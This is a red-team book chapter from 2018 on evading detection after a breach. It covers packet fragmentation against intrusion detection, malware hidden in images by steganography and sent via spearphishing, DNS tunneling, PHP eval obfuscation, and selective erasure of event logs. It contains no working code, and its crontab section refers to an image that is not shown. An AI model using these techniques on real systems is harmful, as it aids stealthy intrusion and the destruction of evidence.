Evasion & Obfuscation Techniques
*Note: This article was originally published by the author on November 7, 2018, as part of the Peerlyst Red Team Book collaboration.
“Subtle and insubstantial, the expert leaves no trace; divinely mysterious, he is inaudible. Thus he is the master of his enemy’s fate.” ~Sun Tzu, The Art of War
Congratulations are in order, “You’re in.” All of the tedious reconnaissance enumeration prep work paid off and successful access to the network or system was achieved. Success was really only ever a matter of time and persistence on the part of the attacker anyway. After all, the defender has the nearly impossible task of being right every time whereas the attacker only has to get lucky one time.
Popping a shell was just the beginning though, now comes the difficult part. How do hackers remain undetected on a system to carry out further exploitation? It is much more difficult than it may seem. Maintaining stealth is of utmost importance with the primary goal of avoiding discovery by remaining as quiet as possible on the system. Evasion and obfuscation are about treading silently and invisibly to the greatest extent possible to avoid suspicion and detection.
Evasion is bypassing an information security device (e.g., firewall or intrusion detection/prevention systems) in order to deliver an exploit, attack, or other form of malware to a target network or system, without detection.
There are numerous methods and tools that attackers can use to evade network and system-level detection. The concepts discussed in this chapter are not meant to be an exhaustive compilation, but rather potential starting points to consider during Red Team ops. It is always best to assume the worst and hope for the best so that the team is prepared for any eventuality.
That said, it’s best to assume the compromised system environment is hostile with active system write once read many (worm) event logging that is remotely backed up, an IDS or IPS, anti-virus/malware software scanning, and skilled network security administrators that are actively monitoring and hunting for threats on the network despite the fact that the target system may not have any of that stuff.
Thinking this way forces an attacker to expend all means necessary to remain undetected and avoid sloppy mistakes that are easily traceable. Let’s look at some methods attackers may use to exploit systems and remain relatively quiet and undetectable to the naked eye.
Bypassing Intrusion Detection/Prevention Systems (IDS/IPS)
First, imagine a scenario in which no backdoor exists and the attacker is attempting to gain system access in stealth mode. The attacker will need to contend with the firewall and possibly also an IDS or IPS. Like most security products, IDS solutions are not without vulnerabilities. A network IDS or NIDS performs in-depth packet analysis looking for patterns and anomalies against known malware signature databases.
One method of evading IDS/IPS detection is to perform session splicing also known as fragmenting TCP packets through the firewall and IDS by custom-crafting the packets into packet protocols where it is not likely to be discovered, but that can be reassembled after successfully passing through the firewall and IDS. Doing this forces the NIDS to use more computer resources in an attempt to reconstruct the fragments, a task that it will not always be able to perform successfully.
An attacker might attempt a series of quiet (i.e., signal-to-noise ratio) attacks that involve fragmenting packets only. Or, an attacker could fragment a packet with overwriting. Another option is to initiate an attack followed by many false attacks and then finish the initial attack to confuse the IDS by breaking up the packet strings. A bit of subterfuge…
There are several freely available packet crafting tools that work with the Linux, Mac OSX, and Windows operating systems such as Scapy, Hping, SoCat, Nmap, and Wireshark. As a pentester and Red Team member, find tools that suit your needs and learn what special features each comes equipped with. It is up to you to build your own toolkit.
Every hacker has their own preferences as well as certain Tactics, Techniques, and Procedures (TTP) that can be used to identify them. Additionally, not all hacking tools are created equally. Just as some tools might be a bit noisier than others in terms of detection. Why use a sledgehammer when you can use a precision scalpel? An attacker has several options once they gain system access.
They may attempt some type of privilege escalation perhaps using a User Account Control (UAC) bypass technique and then ‘burn it all down’ or wipe everything (i.e., the sledgehammer approach). The stealthier option, however, would be for the attacker to plant a Trojan backdoor to quietly access the system as desired. Perhaps the target system will yield further valuable Intel or data at a later time, and it could prove valuable as a lateral attack platform to obfuscate the evidence trail.
Nmap is another essential scanning tool that allows an attacker to perform fragmented scans using the -f (fragmented packets) command; or the — MTU (maximum transmission unit) command which is typically defaulted at 1,500 octets (8-bit bytes). If an attacker wanted to fragment a packet at less than the default MTU size (must be in multiples of 8), then it will likely stand a better chance of succeeding without detection depending on how the firewall is configured.
Another option is to use the command: ‘send -eth’ to bypass the Internet Protocol (IP) layer and send raw Ethernet frames instead. Capabilities with Nmap and other packet crafting tools are limited depending on what the user is attempting to perform. A full Nmap OS or Xmas scan, for example, does not support fragmentation and would be far too ‘noisy’ in terms of remaining undetected on the system.
TCP un-sync is another method attackers can use to bypass the IDS/IPS by injecting packets that contain a bad TCP checksum.
An attacker can also inject a fake ‘FIN’ packet or an out-of-sequence packet number that can cause an IDS to ‘hiccup’ and allow a malformed packet through to the host target (e.g., Web or file database servers).
Low Time-To-Live (TTL) packet values refer to the amount of time the packet is allowed to remain active before it disappears forever. An option to bypass detection is to combine packet fragmentation with a low TTL value. This method attempts to trick the IDS/IPS into allowing a packet destined for a host that is behind the IDS. There will be some amount of trial and error before an attacker knows whether these techniques are successful.
Malware Cloaking Using Digital Steganography
While most Red Teams would never consider using digital steganography to gain access to a target system or even know where to begin, it can be a powerful technique that can be combined with other types of attacks. Digital steganography is the ultimate in stealth because it is invisible to the naked eye. Without special scanning software tools, network administrators would be hard-pressed to notice steg activity. Malware may also be customized to incorporate digital steganography to disguise the packets to appear like normal network traffic.
Digital steganography has increasingly been used by cyber threat actors to hide cyber-espionage malware or any type of malware such as Microcin (a.k.a., six little monkeys); NetTraveler; Zberp; Enfal (its new loader is called Zero.T); Shamoon; KinS; ZeusVM; Triton (Fibbit); and most recently it was used by the Narwhal Spider Advanced Persistent Threat (APT) group in combination with MS Excel spreadsheet Visual Basic scripted macros. Embedding the hidden malware within other carrier file types using digital steganography applications has the added benefit of not raising suspicion as it will appear as a normal image, audio, or video file download. Once a hidden file is embedded within the carrier file, it is then known as a stego-file and its hidden file contents can also be encrypted.
How is this useful in terms of Red Team activities? Depending on the Red Team’s agreed-upon Rules of Engagement (ROE) with the customer, they might consider sending a stego-file containing malware such as a backdoor Trojan (e.g., macro-enabled MS Word or Excel are a couple of options). This is a technique that could be combined with Red Team social engineering attacks as an attachment on a spearphishing or whaling email.
Considering that most corporate executives are statistically male, the highest probability of success with blind spearphishing or whaling emails is to attach a stego-image file of an attractive female that relates to whatever subject the phishing email concerns. Once a victim double-clicks the image, the infection occurs invisibly.
Fictitious Scenario: After identifying herself as a software sales associate from [insert real company name here], Donna explains to the target victim, Robert, that she’ll need to email him some product documentation and images so that he can view the product details and determine if his company is interested in purchasing the software that Donna so nicely described over the phone earlier. When the target victim, Robert, receives the bait email that he is anticipating from his previous conversation with Donna, he opens the email and begins viewing the software product documentation, and attached photos of what the Graphics User Interface (GUI) looks like for specific user modules. When Robert clicks to open one of the image files, the action opens the image but also silently triggers the malware dropper hidden within the image file to download the malware payload backdoor Trojan in the background processes. Now Robert’s computer has been infected with malware which could result in the attacker gaining root-level access.
Incorporating digital steganography as an advanced malware detection evasion technique requires an advanced level of skill. Accordingly, malware that incorporates steganography to mask its presence is typically custom-written by skilled malware developers. There are malware development tools available on the Dark Web for a price, but it is highly advised that Red Team pentesters not use such software as it is often malware itself and is illegal to possess.
*NOTE: If found to be in possession or to have used malware, a person can be arrested and charged with the Computer Fraud and Abuse Act (CFAA) as well as other laws. The type of malware suggested here is for Red Team exercises only and should only contain benign exploit payloads that do not inflict any actual system damage in accordance with the rules of engagement that the customer and Red Team have agreed upon.
Covert Channel Data Exfiltration Using DNS Tunneling
In a protected system environment complete with firewalls, anti-virus/malware software, IDS/IPS, external communication between the malware or spyware and a Command and Control (C&C) server is relegated to communicating over covert channels or else it risks immediate detection. Domain Name Service (DNS) plays a vitally important role on the Internet by translating IP addresses to website domain names and vice versa, among other functions.
The DNS protocol operates using User Datagram Protocol (UDP) and limits outbound queries to 255 bytes of alphanumeric characters and hyphens. The fact that DNS operates using UDP and has such small size constraints on external queries is exactly why DNS is an ideal choice for smuggling data into and out of a network. No one would suspect it, and DNSSEC may not be enabled or fully defend against DNS tunneling.
Due to the fact that data can be secretly embedded into the DNS protocol packets, DNS tunneling can be considered a lesser-known form of digital steganography.
Linux Crontab Command
Kronos was the Greek god of time, and of course, Linux has named its command function for scheduling timed automated actions as “crontab”. Attackers can use ‘crontab’ commands to remotely schedule covert actions to occur on a breached system at periodic intervals. For instance, an attacker may want to have a listing of new file names that were added to the system sent back to the C&C server on a weekly basis using hidden DNS tunneling.
To see if there are any crontab events that currently exist, look in the following directory: /var/spool/cron/crontabs
Notice in the example image (above) that Line 1 turns off any error reporting by setting the value inside the parenthesis to “0.” Line 3 is where the command letter reordering occurs with the out-of-order “ps_ot.” Line 4 then instructs it to reorder the letters to spell “_POST.” Lines 5–12 of the code instruct the program to verify the HTTP request was performed using the POST method and “eval” command to run “lequ” malware code without the attacker ever typing the “POST” command and triggering an Event alarm. Character reordering also works with $_POST, $_REQUEST, $_FILES, and $_COOKIE superglobal arrays.
Other PHP evasion techniques involve string manipulation functions such as:
- str_replace: replaces all occurrences of 1st string with the 2nd string in a string of 3 strings
- str_rot13: shifts every letter by 13 places in the English alphabet
- ‘.’ operator: concatenates characters or strings
- strrev: reverses a string
Obfuscating Indicators of Compromise (IoC)
Obfuscation can mean different things to different people depending on the context it is used in. Evasion and obfuscation are interrelated within the hacking universe. Obfuscation is generally defined as making something difficult to understand or trace back to its origin once evasion has either failed or is no longer an option. As one might imagine, there are several methods of performing obfuscation that is limited only by imagination and technological constraints.
Obfuscation is partly why accurate cyber-attack attribution to a specific threat actor or APT group is often said to be a guessing game. For example, there is a high probability that a skilled attacker will know how to cover their tracks and also knows that penetrating a system located in another country or region and then pivoting laterally and attacking another system based in an entirely different country or region has the advantage of making it appear as though the attack originated from somewhere it didn’t. This is a form of obfuscation and it is why intelligence agencies and cybersecurity firms cannot be too quick to point the finger at which nation is responsible though it may appear to be so obvious.
If Israel, for example, wanted to make it appear as though Iranian hackers broke into Saudia Arabia’s critical infrastructure systems and shut down all of their electrical power to spark a war or retaliation, they could hack into Iranian systems and launch the attacks from the compromised Iranian computer systems. Saudia Arabia might then arrive at the conclusion that Iran was responsible, kicking off kinetic military hostilities as retribution. When Nation-state cyber threat actors are involved in these types of cyber warfare or cyber espionage activities, anti-forensic techniques such as erasure of system Event logs to obfuscate forensic investigative purposes should be a consideration and checked against to determine if any logs are missing.
Though it is tempting, forget about disabling system Event logging or purging the logs after successfully accessing a system. This is a rookie n00b move and could be a costly mistake. Disabling or deleting Event logs would be a clear indication to any network security administrator that is paying attention that the system has been compromised. Not to mention, it is an action sure to trip the alarm if a system has an IDS/IPS deployed on the network or if Windows Event Forwarding (WEF) is configured to alert the system administrator of such activity. It is important for Red Team pentesters to fully understand how Event logging functions within the various types of operating systems and database types. Windows is not equal to Linux which is not equal to Mac OSX and so forth.
An attacker may limit their espionage activities on a specific system to a specific time window of say 4-to-8 hours and then erase only the event log(s) for the time period they were inside the system. This might be hard to notice for a security administrator that is responsible for hundreds if not thousands of systems. This is also why Security Information and Event Manager (SIEM, pronounced “sim” with a silent ‘e’) is vital to network security monitoring for large organizations. Modifying or deleting event logs may not be possible, however, if the event logs are configured to automatically be stored externally at another location either within the network or an entirely different Cloud-Service Provider (C-SP) storage/backup solution.
When conducting Red Team ops, it is generally best to behave like a normal user to avoid detection. Think of the user environment and what type of business activities users might be typically involved in. Creating a general user account on the system is one method of laying low under the radar and accessing files to see what the system has. When performing actions that require escalated privileges, perform actions at the lowest level possible and then login as root to selectively erase the event log items (if possible). Keep actions to a minimum when in the “God-mode” root-level to minimize ‘noise’ within the system that will attract attention. In order to obfuscate the metadata associated with Event logs, a tool such as TimeStomp can be utilized.